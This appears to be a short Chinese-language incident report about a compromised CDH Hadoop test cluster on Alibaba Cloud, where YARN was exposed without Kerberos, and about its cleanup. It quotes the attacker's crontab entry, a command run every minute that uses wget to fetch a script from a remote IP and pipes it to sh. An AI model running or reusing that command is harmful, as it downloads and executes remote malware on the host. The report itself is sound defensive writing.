测试环境在阿里云上暴露出了公网端口,前一段时间CDH集群原本是开启了Kerberos认证,但是因为大家反映使用麻烦,所以就又关闭了Kerberos。
最近几天大家普遍反映测试环境上hive和hdfs job执行很慢,yarn进程的cpu使用率持续在200%以上,经过排除CPU使用率已经连续两天100%且没有降下来,查看job如下
有39个job明细多余开发提交的任务数量,且User来自dr.who,这个之前没有见过,初步断定遭受了攻击,
切换到yarn用户下:
sudo -u yarn crontab -l显示* * * * * wget -q -O – http://46.249.38.186/cr.sh | sh > /dev/null 2>&1且在/var/tmp目录下多出了一个java文件 解决办法是关闭掉crontab调度,并且删掉/var/tmp/java文件,重新开启kerberos认证服务器恢复正常